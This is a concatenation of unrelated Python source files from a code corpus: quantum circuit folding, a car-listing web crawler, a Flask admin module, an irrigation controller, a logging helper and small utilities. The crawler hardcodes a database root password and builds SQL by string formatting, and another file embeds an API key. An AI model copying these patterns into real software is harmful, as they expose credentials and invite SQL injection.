_fold_gates_in_moment(\n folded, moment_index + moment_index_shift, gate_indices[i]\n )\n moment_index_shift += 2 * len(\n gate_indices[i]\n ) # Folding gates adds moments\n return folded\n\n\ndef _fold_moments(circuit: Circuit, moment_indices: List[int]) -> None:\n \"\"\"Folds specified moments in the circuit in place.\n\n Args:\n circuit: Circuit to fold.\n moment_indices: Indices of moments to fold in the circuit.\n\n \"\"\"\n shift = 0\n for i in moment_indices:\n circuit.insert(\n i + shift, [circuit[i + shift], inverse(circuit[i + shift])]\n )\n shift += 2\n\n\n@converter\ndef fold_moments(circuit: QPROGRAM,\n moment_indices: List[int],\n **kwargs\n ) -> QPROGRAM:\n \"\"\"Returns a new circuit with moments folded by mapping\n\n M_i -> M_i M_i^dag M_i\n\n where M_i is a moment specified by an integer in moment_indices.\n\n Args:\n circuit: Circuit to apply folding operation to.\n moment_indices: List of integers that specify moments to fold.\n\n Keyword Args:\n keep_input_type: If True, returns a circuit of the input type, else\n returns a mitiq circuit.\n\n Returns:\n folded: the folded quantum circuit as a :class:`cirq.Circuit` object.\n \"\"\"\n folded = deepcopy(circuit)\n _fold_moments(folded, moment_indices)\n return folded\n\n\ndef _fold_all_gates_locally(circuit: Circuit) -> None:\n \"\"\"Replaces every gate G with G G^dag G by modifying the circuit in place.\n \"\"\"\n _fold_moments(circuit, list(range(len(circuit))))\n\n\ndef _get_num_to_fold(stretch: float, ngates: int) -> int:\n \"\"\"Returns the number of gates to fold to achieve the desired (approximate)\n stretch factor.\n\n Args:\n stretch: Floating point value to stretch the circuit by.\n ngates: Number of gates in the circuit to stretch.\n \"\"\"\n return int(round(ngates * (stretch - 1.0) / 2.0))\n\n\n@converter\ndef fold_gates_from_left(\n circuit: QPROGRAM, stretch: float, **kwargs\n) -> QPROGRAM:\n \"\"\"Returns a new folded circuit by applying the map G -> G G^dag G to a\n subset of gates of the input circuit, starting with gates at the\n left (beginning) of the circuit.\n\n The folded circuit has a number of gates approximately equal to\n stretch * n where n is the number of gates in the input circuit.\n\n Args:\n circuit: Circuit to fold.\n stretch: Factor to stretch the circuit by. Any real number in [1, 3].\n\n Keyword Args:\n keep_input_type: If True, returns a circuit of the input type, else\n returns a mitiq circuit.\n\n Returns:\n folded: the folded quantum circuit as a :class:`cirq.Circuit` object.\n\n Note:\n Folding a single gate adds two gates to the circuit,\n hence the maximum stretch factor is 3.\n \"\"\"\n if not circuit.are_all_measurements_terminal():\n raise ValueError(\n f\"Input circuit contains intermediate measurements\"\n \" and cannot be folded.\"\n )\n\n if not 1 <= stretch <= 3:\n raise ValueError(\n \"The stretch factor must be a real number between 1 and 3.\"\n )\n\n folded = deepcopy(circuit)\n\n measurements = _pop_measurements(folded)\n\n ngates = len(list(folded.all_operations()))\n num_to_fold = _get_num_to_fold(stretch, ngates)\n if num_to_fold == 0:\n _append_measurements(folded, measurements)\n return folded\n num_folded = 0\n moment_shift = 0\n\n for (moment_index, moment) in enumerate(circuit):\n for gate_index in range(len(moment)):\n _fold_gate_at_index_in_moment(\n folded, moment_index + moment_shift, gate_index\n )\n moment_shift += 2\n num_folded += 1\n if num_folded == num_to_fold:\n _append_measurements(folded, measurements)\n return folded\n\n\n@converter\ndef fold_gates_from_right(\n circuit: QPROGRAM, stretch: float, **kwargs\n) -> Circuit:\n \"\"\"Returns a new folded circuit by applying the map G -> G G^dag G\n to a subset of gates of the input circuit, starting with gates at\n the right (end) of the circuit.\n\n The folded circuit has a number of gates approximately equal to\n stretch * n where n is the number of gates in the input circuit.\n\n Args:\n circuit: Circuit to fold.\n stretch: Factor to stretch the circuit by. Any real number in [1, 3].\n\n Keyword Args:\n keep_input_type: If True, returns a circuit of the input type, else\n returns a mitiq circuit.\n\n Returns:\n folded: the folded quantum circuit as a :class:`cirq.Circuit` object.\n\n Note:\n Folding a single gate adds two gates to the circuit,\n hence the maximum stretch factor is 3.\n \"\"\"\n if not circuit.are_all_measurements_terminal():\n raise ValueError(\n f\"Input circuit contains intermediate measurements\" \\\n \" and cannot be folded.\"\n )\n\n measurements = _pop_measurements(circuit)\n\n reversed_circuit = Circuit(reversed(circuit))\n reversed_folded_circuit = fold_gates_from_left(reversed_circuit, stretch)\n folded = Circuit(reversed(reversed_folded_circuit))\n _append_measurements(folded, measurements)\n return folded\n\n\ndef _update_moment_indices(\n moment_indices: dict, moment_index_where_gate_was_folded: int\n) -> dict:\n \"\"\"Updates moment indices to keep track of an original circuit\n throughout folding.\n\n Args:\n moment_indices: A dictionary in the format\n {index of moment in original circuit: index of moment\n in folded circuit}\n\n moment_index_where_gate_was_folded: Index of the moment\n in which a gate was folded.\n\n Returns:\n moment_indices: dictionary with updated moments.\n\n Note:\n `moment_indices` should start out as\n {0: 0, 1: 1, ..., M - 1: M - 1} where M is the # of moments in the\n original circuit. As the circuit is folded, moment indices change.\n\n If a gate in the last moment is folded, moment_indices gets updates to\n {0: 0, 1: 1, ..., M - 1:, M + 1} since two moments are created in the\n process of folding the gate in the last moment.\n\n TODO:\n If another gate from the last moment is folded, we could put it\n in the same moment as the previous folded gate.\n \"\"\"\n if moment_index_where_gate_was_folded not in moment_indices.keys():\n raise ValueError(\n f\"Moment index {moment_index_where_gate_was_folded} not in moment\"\\\n \" indices\"\n )\n for i in moment_indices.keys():\n moment_indices[i] += 2 * int(i >= moment_index_where_gate_was_folded)\n return moment_indices\n\n\n@converter\ndef fold_gates_at_random(\n circuit: QPROGRAM, stretch: float, seed: Optional[int] = None, **kwargs\n) -> QPROGRAM:\n \"\"\"Returns a folded circuit by applying the map G -> G G^dag G to a random\n subset of gates in the input circuit.\n\n The folded circuit has a number of gates approximately equal to\n stretch * n where n is the number of gates in the input circuit.\n\n Args:\n circuit: Circuit to fold.\n stretch: Factor to stretch the circuit by. Any real number in [1, 3].\n seed: [Optional] Integer seed for random number generator.\n\n Keyword Args:\n keep_input_type: If True, returns a circuit of the input type, else\n returns a mitiq circuit.\n\n Returns:\n folded: The folded quantum circuit as a :class:`cirq.Circuit` object.\n\n Note:\n Folding a single gate adds two gates to the circuit, hence the maximum\n stretch factor is 3.\n \"\"\"\n if not circuit.are_all_measurements_terminal():\n raise ValueError(\n f\"Input circuit contains intermediate measurements\"\n \" and cannot be folded.\"\n )\n\n if not 1 <= stretch <= 3:\n raise ValueError(\n \"The stretch factor must be a real number between 1 and 3.\"\n )\n\n folded = deepcopy(circuit)\n\n measurements = _pop_measurements(folded)\n\n if np.isclose(stretch, 3.0, atol=1e-3):\n _fold_all_gates_locally(folded)\n _append_measurements(folded, measurements)\n return folded\n\n if seed:\n np.random.seed(seed)\n\n ngates = len(list(folded.all_operations()))\n num_to_fold = _get_num_to_fold(stretch, ngates)\n\n # Keep track of where moments are in the folded circuit\n moment_indices = {i: i for i in range(len(circuit))}\n\n # Keep track of which gates we can fold in each moment\n remaining_gate_indices = {\n moment: list(range(len(circuit[moment])))\n for moment in range(len(circuit))\n }\n\n # Any moment with at least one gate is fair game\n remaining_moment_indices = [\n i for i in remaining_gate_indices.keys() if remaining_gate_indices[i]\n ]\n\n for _ in range(num_to_fold):\n # Get a moment index and gate index from the remaining set\n moment_index = np.random.choice(remaining_moment_indices)\n gate_index = np.random.choice(remaining_gate_indices[moment_index])\n\n # Do the fold\n _fold_gate_at_index_in_moment(\n folded, moment_indices[moment_index], gate_index\n )\n\n # Update the moment indices for the folded circuit\n _update_moment_indices(moment_indices, moment_index)\n\n # Remove the gate we folded from the remaining set of gates to fold\n remaining_gate_indices[moment_index].remove(gate_index)\n\n # If there are no gates left in the moment,\n # remove the moment index from the remaining set\n if not remaining_gate_indices[moment_index]:\n remaining_moment_indices.remove(moment_index)\n\n _append_measurements(folded, measurements)\n return folded\n\n\n@converter\ndef fold_local(\n circuit: QPROGRAM,\n stretch: float,\n fold_method: Callable[\n [Circuit, float, Tuple[Any]], Circuit\n ] = fold_gates_from_left,\n fold_method_args: Tuple[Any] = (),\n **kwargs\n) -> QPROGRAM:\n \"\"\"Returns a folded circuit by folding gates according to the input\n fold method.\n\n Args:\n circuit: Circuit to fold.\n stretch: Factor to stretch the circuit by.\n fold_method: Function which defines the method for folding gates.\n fold_method_args: Any additional input arguments for the fold_method.\n The method is called with\n fold_method(circuit, stretch, *fold_method_args).\n\n Keyword Args:\n keep_input_type: If True, returns a circuit of the input type, else\n returns a mitiq circuit.\n\n Returns:\n folded: The folded quantum circuit as a :class:`cirq.Circuit` object.\n\n Example:\n >>> fold_method = fold_gates_at_random\n >>> fold_method_args = (1,)\n Uses a seed of one for the fold_gates_at_random method.\n\n Note:\n `fold_method` defines the strategy for folding gates, which could be\n folding gates at random, from the left of the circuit,\n or custom strategies.\n\n The signature of `fold_method` must be\n ```\n def fold_method(circuit: Circuit, stretch: float,**kwargs):\n ...\n ```\n and return a circuit.\n \"\"\"\n folded = deepcopy(circuit)\n\n if np.isclose(stretch, 1.0, atol=1e-2):\n return folded\n\n if not 1 <= stretch:\n raise ValueError(\n f\"The stretch factor must be a real number greater than 1.\"\n )\n\n while stretch > 1.0:\n this_stretch = 3.0 if stretch > 3.0 else stretch\n folded = fold_method(folded, this_stretch, *fold_method_args)\n stretch /= 3.0\n return folded\n\n\n# Circuit level folding\n@converter\ndef fold_global(circuit: QPROGRAM, stretch: float, **kwargs) -> QPROGRAM:\n \"\"\"Gives a circuit by folding the global unitary of the input circuit.\n\n The returned folded circuit has a number of gates approximately equal to\n stretch * len(circuit).\n\n Args:\n circuit: Circuit to fold.\n stretch: Factor to stretch the circuit by.\n\n Keyword Args:\n keep_input_type: If True, returns a circuit of the input type, else\n returns a mitiq circuit.\n\n Returns:\n folded: The folded quantum circuit as a :class:`cirq.Circuit` object.\n \"\"\"\n if not (stretch >= 1):\n raise ValueError(\"The stretch factor must be a real number >= 1.\")\n\n if not circuit.are_all_measurements_terminal():\n raise ValueError(\n \"Input circuit contains intermediate measurements\"\n \" and cannot be folded.\"\n )\n\n folded = deepcopy(circuit)\n measurements = _pop_measurements(folded)\n base_circuit = deepcopy(folded)\n\n # Determine the number of global folds and the final fractional stretch\n num_global_folds, fractional_stretch = divmod(stretch - 1, 2)\n # Do the global folds\n for _ in range(int(num_global_folds)):\n folded += Circuit(inverse(base_circuit), base_circuit)\n\n # Fold remaining gates until the stretch is reached\n ops = list(base_circuit.all_operations())\n num_to_fold = int(round(fractional_stretch * len(ops) / 2))\n\n if num_to_fold > 0:\n folded += Circuit([inverse(ops[-num_to_fold:])], [ops[-num_to_fold:]])\n\n _append_measurements(folded, measurements)\n return folded\n","sub_path":"artifacts/minimal_bugfixes/mitiq/mitiq#125/after/folding.py","file_name":"folding.py","file_ext":"py","file_size_in_byte":19792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"646759470","text":"'''\nWrite a Python program to get the factorial of a non-negative integer.\n'''\n\ndef factorial(num):\n if num <= 1:\n return 1\n else:\n return num * factorial(num - 1)\n\nprint (factorial(13))","sub_path":"Recursion/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"635109058","text":"'''\n 5단계\n 각 페이지에서 제목/가격/판매자명을 DB에 저장\n 한글은 int 타입 컬럼에 입력불가한 관계로,\n 판매완료는 0, 계약은 1로 저장함\n'''\n# 1) 필요한 라이브러리 import\nfrom bs4 import BeautifulSoup as bs\nfrom urllib.request import urlopen\nfrom google.cloud import storage as gcs\nimport os, pymysql, time\n\nconn = pymysql.connect(host='34.64.176.78', port=3306,\n db='mycar', user='root', password='admin1234',\n charset='utf8')\n\ncursor = conn.cursor()\nsql = \"select idx,url from intercar where price is null\"\ncursor.execute(sql)\nurls = cursor.fetchall()\n\nfor idxurl in urls:\n # 차량 각 상세페이지 열기\n idx,url = idxurl\n print(\"idx : \", idx)\n html = urlopen(url)\n soup = bs(html, \"html.parser\")\n title = soup.select_one('div.title-area h3.tit').text\n price = soup.select_one('div.price-area b').text.replace(',','')\n seller = soup.select_one('div.seller-data div.seller-state b').text\n\n if price=='[판매완료]':\n update_sql = \"UPDATE intercar SET title='{}',price=0,seller='{}' where idx={}\".format(title, seller,idx)\n elif price=='[계약]':\n update_sql = \"UPDATE intercar SET title='{}',price=1,seller='{}' where idx={}\".format(title, seller, idx)\n elif price=='[가격상담]':\n update_sql = \"UPDATE intercar SET title='{}',price=2,seller='{}' where idx={}\".format(title, seller, idx)\n elif price=='[보류]':\n update_sql = \"UPDATE intercar SET title='{}',price=3,seller='{}' where idx={}\".format(title, seller, idx)\n else:\n update_sql = \"UPDATE intercar SET title='{}',price={},seller='{}' where idx={}\".format(title,price,seller,idx)\n print(update_sql)\n cursor.execute(update_sql)\n conn.commit()\n\ncursor.close()\nconn.close()\nprint('완료')\n\n\n","sub_path":"imgcrawling5.py","file_name":"imgcrawling5.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"498559333","text":"import argparse\n\nfrom python_qt_binding import QT_BINDING\nfrom python_qt_binding.QtCore import qDebug\nfrom rqt_gui_py.plugin import Plugin\n\nfrom rqt_py_common.ini_helper import pack, unpack\n\nfrom .plot_widget import PlotWidget\n\nfrom .data_plot import DataPlot\n\nclass Plot(Plugin):\n \n def __init__(self , context):\n super(Plot , self).__init__(context)\n self.setObjectName('plot')\n \n self._context = context\n self._widget = PlotWidget()\n self._data_plot = DataPlot(self._widget)\n \n #set parameters of data_plot \n self._data_plot.set_autoscale(x=False)\n self._data_plot.set_autoscale(y=DataPlot.SCALE_EXTEND | DataPlot.SCALE_VISIBLE)\n self._data_plot.set_xlim([0 , 10.0])\n \n self._widget.switch_data_plot_widget(self._data_plot)\n \n if context.serial_number() > 1:\n self._widget.setWindowTitle(self._widget.windowTitle() + (' (%d)' % context.serial_number()))\n context.add_widget(self._widget)\n \n def _update_title(self):\n #self._widget.setWindowTitle(self._data_plot.getTitle())\n if self._context.serial_number() > 1:\n self._widget.setWindowTitle(self._widget.windowTitle() + (' (%d)' % self._context.serial_number())) \n \n def save_settings(self, plugin_settings, instance_settings):\n self._data_plot.save_settings(plugin_settings, instance_settings)\n \n def restore_settings(self, plugin_settings, instance_settings):\n self._update_title()\n self._data_plot.restore_settings(plugin_settings, instance_settings) \n \n def trigger_configuration(self):\n self._data_plot.doSettingsDialog()\n self._update_title()\n\n def shutdown_plugin(self):\n self._widget.clean_up_subscribers() \n \n \n \n ","sub_path":"dragon_visualization/rqt_plot_rf/src/rqt_plot_rf/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"468888947","text":"class Stock:\n def __init__(self):\n self.first = None\n \n def add(self, product):\n t = product\n t.next = self.first\n self.first = t \n\n def list(self):\n s = self.first.toString() + \"\\n\"\n t = self.first.next\n while(t != None):\n s += t.toString() + \"\\n\"\n t = t.next\n\n return s;\n\n def delete(self, id):\n t = self.first\n while(t != None and t.next.id != id):\n t = t.next\n \n t.next = t.next.next\n return True;\n \n def search(self, id):\n t = self.first\n while(t != None and t.id != id ):\n t = t.next\n \n if(t == None):\n return None\n if(t.id == id):\n return t\n ","sub_path":"DataStructure/CRUD Simple Lists/Stock.py","file_name":"Stock.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"287960993","text":"import logging\n\nimport click\n\nimport packit\nfrom packit.cli.sourcegit_to_dist_git import sg2dg\nfrom packit.cli.sourcegit_to_srpm import sg2srpm\nfrom packit.cli.watch_fedora_ci import watcher\nfrom packit.cli.watch_sg_pr import watch_pr\nfrom packit.config import Config, get_context_settings\nfrom packit.utils import set_logging\n\nlogger = logging.getLogger(__name__)\n\n\n@click.group(\"packit\", context_settings=get_context_settings())\n@click.option(\"-d\", \"--debug\", is_flag=True)\n@click.option(\"--fas-user\")\n@click.option(\"-k\", \"--keytab\")\n@click.option(\"-v\", \"--verbose\", is_flag=True)\n@click.pass_context\ndef packit_base(ctx, **kwargs):\n ctx.obj = Config(**kwargs)\n if ctx.obj.debug:\n set_logging(level=logging.DEBUG)\n logger.debug(\"logging set to DEBUG\")\n\n elif ctx.obj.verbose:\n set_logging(level=logging.INFO,\n format=\"%(message)s\")\n logger.debug(\"logging set to INFO\")\n\n\n@click.command(\"version\")\ndef version():\n \"\"\"Display the version.\"\"\"\n click.echo(packit.__version__)\n\n\npackit_base.add_command(sg2dg)\npackit_base.add_command(sg2srpm)\npackit_base.add_command(watcher)\npackit_base.add_command(version)\npackit_base.add_command(watch_pr)\n\nif __name__ == '__main__':\n packit_base()\n","sub_path":"packit/cli/packit_base.py","file_name":"packit_base.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"644585221","text":"#!/usr/bin/python\n#\n# Copyright 2018 Jigsaw Operations LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport argparse\nimport asyncio\nimport ipaddress\nimport pprint\nimport socket\nimport sys\n\nimport netanalysis.analysis.simple_autonomous_system as sas\nfrom netanalysis.dns import domain_ip_validator\nimport netanalysis.model.autonomous_system as model\n\ndef resolve_ip(ip) -> str:\n try:\n return socket.gethostbyaddr(ip.compressed)[0]\n except socket.herror:\n return None\n\ndef main(args):\n ip_address = args.ip_address[0]\n as_repo = sas.create_default_as_repo() # type: model.AsRepository\n asys = as_repo.get_as_for_ip(ip_address) # type: model.AutonomousSytem\n print(\"ASN: %d (%s)\" % (asys.id, asys.name))\n # AS Type is is experimental and outdated data.\n print(\"Type: %s\" % asys.type.name)\n print(\"Org: %s (country: %s, name: %s)\" % (asys.org.id, asys.org.country, asys.org.name))\n if ip_address.is_global:\n hostname = resolve_ip(ip_address)\n if hostname:\n print(\"Hostname: %s\" % hostname)\n else:\n print(\"IP in not global\")\n validator = domain_ip_validator.DomainIpValidator()\n try:\n cert = asyncio.get_event_loop().run_until_complete(validator.get_cert(None, ip_address))\n if cert:\n print(\"TLS Certificate:\\n%s\" % pprint.pformat(cert, width=100, compact=True))\n except Exception as e:\n print(\"TLS Certificate: %s\" % repr(e))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description='Gets information about the given IP address')\n parser.add_argument('ip_address', type=ipaddress.ip_address,\n nargs=1, help='The IP address to get information fo')\n sys.exit(main(parser.parse_args()))\n","sub_path":"netanalysis/analysis/ip_info.py","file_name":"ip_info.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"268336487","text":"# coding:utf-8\n\nfrom flask import Blueprint, request, render_template\nfrom flask_user import roles_required\nfrom ...helpers.flask_helper import json_response\nfrom ...models import Pattern\nfrom ...services import pattern_service\n\nbp = Blueprint('admin_patterns', __name__, url_prefix='/admin/patterns')\n\n\n@bp.route('/', methods=['GET'])\n@roles_required('admin')\ndef home_page():\n return render_template('backend/patternsMgr.html')\n\n\n@bp.route('/list', methods=['GET'])\ndef list_pattern():\n limit = int(request.args.get('iDisplayLength', '10'))\n offset = int(request.args.get('iDisplayStart', '0'))\n sEcho = request.args.get('sEcho')\n name = request.args.get('name', None)\n count, patterns = pattern_service.paginate_pattern(offset, limit, name=name)\n return json_response(sEcho=sEcho, iTotalRecords=count, iTotalDisplayRecords=count, aaData=patterns)\n\n\n@bp.route('/create', methods=['GET'])\n@bp.route('//update', methods=['GET'])\ndef create_or_update_pattern_page(pattern_id=None):\n if pattern_id:\n pattern = Pattern.from_cache_by_id(pattern_id)\n else:\n pattern = {}\n\n return render_template('backend/patternUpdate.html', pattern=pattern)\n\n\n@bp.route('/create', methods=['POST'])\ndef create_pattern():\n pattern = pattern_service.create_pattern(**request.json)\n return json_response(pattern=pattern)\n\n\n@bp.route('//update', methods=['POST'])\ndef update_pattern(pattern_id):\n pattern = pattern_service.update_pattern(pattern_id, **request.json)\n return json_response(pattern=pattern)\n\n\n@bp.route('//delete', methods=['POST'])\ndef delete_pattern(pattern_id):\n pattern_service.delete_pattern(pattern_id)\n return json_response(success=True)\n\n\n@bp.route('/', methods=['GET'])\ndef get_pattern(pattern_id):\n pattern = Pattern.from_cache_by_id(pattern_id)\n return json_response(pattern=pattern)\n","sub_path":"web_app/frontend/admin/patterns.py","file_name":"patterns.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"332273705","text":"from os import write\nimport urllib\nimport json\nimport pprint\nimport urllib.request\nfrom datetime import date\nimport time\napi = \"http://api.openweathermap.org/data/2.5/forecast?id=524901&appid=0b7c4978dda884bbfb0397d03033509f\"\nsapi = \"http://api.openweathermap.org/data/2.5/forecast/daily?zip=94032&appid=0b7c4978dda884bbfb0397d03033509f\" \n\nsaapi = \"http://api.openweathermap.org/data/2.5/weather?q=Passau&appid=0b7c4978dda884bbfb0397d03033509f\"\n\nsensor_state = {\n \"Analog_Rain\": 1,\n \"Digital_Rain\": 1,\n \"Temp\": 1,\n \"Soil_Moisture\": 1,\n}\n\ndef getDate():\n today = date.today()\n d1 = today.strftime(\"%d/%m/%Y\")\n return d1\n\nirrigation_state = {\n \"irrgatedToday\" : False,\n \"date\": getDate()\n}\n\n\n# Reading Sensor data \nwith open(\"sensors.json\") as jsonFile:\n jsonObject = json.load(jsonFile)\n jsonFile.close()\n\ncurrentSensorvalues = jsonObject[0]\nlastMoistureValue = {\n\n}\nif(currentSensorvalues['Soil_Moisture'] <= 1200):\n lastRecordedMoistureValue = currentSensorvalues['Soil_Moisture']\n lastRecordedTime =timestamp = int(time.time()*1000.0)\n lastMoistureValue['Soil_Moisture'] = lastRecordedMoistureValue\n lastMoistureValue['time'] = lastRecordedTime\n\n\nprint(\"Current sensor values\")\nprint(currentSensorvalues)\nprint(\"\\n\")\n\n\ndef saveState():\n \n with open(\"sensors_state.json\", \"w\") as f: \n json.dump(sensor_state, f)\n f.close()\n\n\ndef showWarnings():\n print(\"\\n\")\n print(\"Sensors have failed and could not fetch data from cloud\")\n exit(1)\n\ndef getCurrentWeatherConditions():\n response = urllib.request.urlopen(saapi)\n output = response.read().decode('utf-8')\n return json.loads(output)\n\ndef irrigate(time):\n print(\"Current Sensor state\")\n print(sensor_state)\n print(\"\\n\\n\")\n print(\"------------Determined irrigation--------------\")\n print(\"Irrgating for \"+ str(time) + \" minutes\")\n irrgatedToday = True\n saveState()\n \n\ndef doNotIrrigate(time):\n print(\"Current Sensor state\")\n print(sensor_state)\n print(\"\\n\\n\")\n print(\"------------Determined irrigation--------------\")\n print(\"No need to irrigate now\")\n saveState()\n\n\ndef getEstimatedMoisture():\n # decreases in time , check the last recorded value\n currentTemperature = currentSensorvalues['Temperature']\n currentTimestamp = int(time.time()*1000.0)\n difference = currentTimestamp - lastMoistureValue['time']\n moist = currentSensorvalues['Soil_Moisture'] - ((difference/1000) * currentTemperature)\n return moist\n\ndef controlLogic():\n\n # Fix missing sensor data with api\n try:\n cloud_data = getCurrentWeatherConditions()\n except:\n cloud_data = \"Unable to fetch\"\n # pprint.pprint(cloud_data)\n if(currentSensorvalues['Soil_Moisture'] == 9999):\n print(\"WARNING..Soil_Moisture sensor has failed\")\n\n # currentSensorvalues['Soil_Moisture'] = getEstimatedMoisture()\n # print(\"estimated moisture\")\n # print(currentSensorvalues['Soil_Moisture'])\n sensor_state['Soil_Moisture'] = 0\n\n \n if ( currentSensorvalues['Digital_Rain'] == 9999 or currentSensorvalues['Analog_Rain'] == 9999):\n print(\"WARNING.. Using data from the cloud. Rain sensor has failed\")\n sensor_state['Digital_Rain'] = 0\n sensor_state['Analog_Rain'] = 0\n if(cloud_data == 'Unable to fetch'):\n return showWarnings() \n\n if(cloud_data['weather'][0]['main']=='Rain' or cloud_data['weather'][0]['main']=='Light rain'):\n \n currentSensorvalues['Digital_Rain'] = 1\n print(currentSensorvalues)\n currentSensorvalues['Analog_Rain'] = 2500\n \n\n else:\n currentSensorvalues['Digital_Rain'] = 0\n currentSensorvalues['Analog_Rain'] = 4000\n\n\n \n if( currentSensorvalues['Soil_Moisture'] <300 and (currentSensorvalues['Analog_Rain']>3000 and currentSensorvalues['Analog_Rain']<4500)):\n irrigate(5)\n \n else:\n doNotIrrigate(5)\n\n\n\n\ncontrolLogic()\n\n\n\n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"325520765","text":"from logging import LogRecord\nfrom typing import Optional\n\nfrom six import string_types\n\nimport frappe\nimport uuid\nimport logging\nimport zlib\nfrom socket import gethostname\nfrom logging.handlers import RotatingFileHandler\nfrom pygelf import GelfUdpHandler\nfrom frappe.model.document import Document\nfrom latte.json import dumps_binary, loads\nfrom traceback import walk_stack\nfrom frappe import local\n\nclass CustomAttributes(logging.Filter):\n\t__slots__ = [\n\t\t'__modulename',\n\t\t'__index_name',\n\t\t'__storage_key',\n\t]\n\tdef __init__(self, *args, modulename=None, index_name=None, storage_key=None, **kwargs):\n\t\tself.__modulename = modulename\n\t\tself.__index_name = index_name\n\t\tself.__storage_key = storage_key\n\t\tsuper().__init__(*args, **kwargs)\n\n\tdef filter(self, record):\n\t\tmessage = enrich(record.msg)\n\n\t\tmessage['module'] = self.__modulename\n\t\tmessage['index_name'] = self.__index_name\n\t\tmessage['storage_key'] = self.__storage_key\n\t\tmessage['timestamp'] = record.created\n\t\tmessage['host'] = gethostname()\n\n\t\tif isinstance(message, frappe._dict):\n\t\t\tmessage = dict(message)\n\n\t\trecord.msg = dumps_binary(message)\n\n\t\treturn True\n\ndef enrich(logged_msg):\n\tif isinstance(logged_msg, dict):\n\t\tmessage = logged_msg\n\telif isinstance(logged_msg, Document):\n\t\tmessage = logged_msg.as_dict()\n\telse:\n\t\tmessage = {'info': logged_msg}\n\n\tflags = local.flags\n\n\tflags.request_id_number = (flags.request_id_number or 0) + 1\n\n\trequest_id = flags.request_id\n\n\tif not request_id:\n\t\trequest_id = flags.request_id = str(uuid.uuid4())\n\n\tif 'request_id' not in message:\n\t\tmessage['request_id'] = request_id\n\n\tif 'task_id' not in message:\n\t\tmessage['task_id'] = flags.task_id\n\n\tif 'runner_type' not in message:\n\t\tmessage['runner_type'] = flags.runner_type\n\n\tmessage['log_number'] = flags.request_id_number\n\tmessage['site'] = getattr(local, 'site', None)\n\n\tif 'user' not in message:\n\t\tmessage['user'] = frappe.session.user\n\tif 'log_identity' not in message:\n\t\tmessage['log_identity'] = flags.log_identity\n\tif 'method' not in message:\n\t\tmessage['method'] = flags.current_running_method\n\n\treturn message\n\ndef get_logger(module=None, with_more_info=False, index_name=None):\n\tif module is None:\n\t\tframe = next(walk_stack(None))[0]\n\t\tmodule = f'{frame.f_code.co_filename} | {frame.f_code.co_name}'\n\n\tstorage_key = f'{module}_{index_name or \"default\"}'\n\ttry:\n\t\treturn frappe.loggers[storage_key]\n\texcept KeyError:\n\t\tpass\n\n\tlogger = logging.getLogger(storage_key)\n\tfrappe.loggers[storage_key] = logger\n\n\tif getattr(logger, '__patched', None):\n\t\treturn logger\n\t#logger.__patched = True\n\n\tlogger_type = local.conf.logger_type\n\t# logger.addFilter(CustomAttributes(\n\t# \tmodulename=module,\n\t# \tindex_name=index_name or 'default',\n\t# \tstorage_key=storage_key,\n\t# ))\n\n\thandler = None\n\tif logger_type != 'file':\n\t\thandler = get_gelf_handler()\n\t\tlogger.addFilter(CustomAttributes(\n\t\t\t\tmodulename=module,\n\t\t\t\tindex_name=index_name or 'default',\n\t\t\t\tstorage_key=storage_key,\n\t\t))\n\tif not handler:\n\t\tformatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\n\t\thandler = RotatingFileHandler(\n\t\t\t\tlocal.conf.logfile or '../logs/frappe.log',\n\t\t\tmaxBytes=100 * 1024 * 1024,\n\t\t\tbackupCount=10,\n\t\t)\n\t\thandler.setFormatter(formatter)\n\n\tlogger.addHandler(handler)\n\tlogging_level = local.conf.logging_level or logging.INFO\n\tif str(logging_level).isnumeric():\n\t\tlogging_level = int(logging_level)\n\tlogger.setLevel(logging_level)\n\tlogger.propagate = True\n\tlogger.__patched = True\n\treturn logger\n\n\ndef get_gelf_handler():\n\tgelf_config = local.conf.gelf_config\n\tif not gelf_config:\n\t\treturn\n\n\tgelf_gelf_host = gelf_config.get('host', '127.0.0.1')\n\tgelf_gelf_port = gelf_config.get('port', 32000)\n\treturn CustomGelfUdpHandler(host=gelf_gelf_host, port=gelf_gelf_port, include_extra_fields=True)\n\nclass CustomGelfUdpHandler(GelfUdpHandler):\n\tdef convert_record_to_gelf(self, record):\n\t\treturn zlib.compress(record.msg)\n\n\n# class DictMessageFormatter(logging.Formatter):\n#\n# \tdef __init__(self, fmt: Optional[str] = ..., ) -> None:\n# \t\tsuper().__init__(fmt, validate=False)\n#\n# \tdef formatMessage(self, record: LogRecord) -> str:\n# \t\tmsg = record.msg\n# \t\tif msg:\n# \t\t\tif isinstance(msg, dict):\n# \t\t\t\tmsg_dict = msg\n# \t\t\telif isinstance(msg, string_types):\n# \t\t\t\ttry:\n# \t\t\t\t\tmsg_dict = 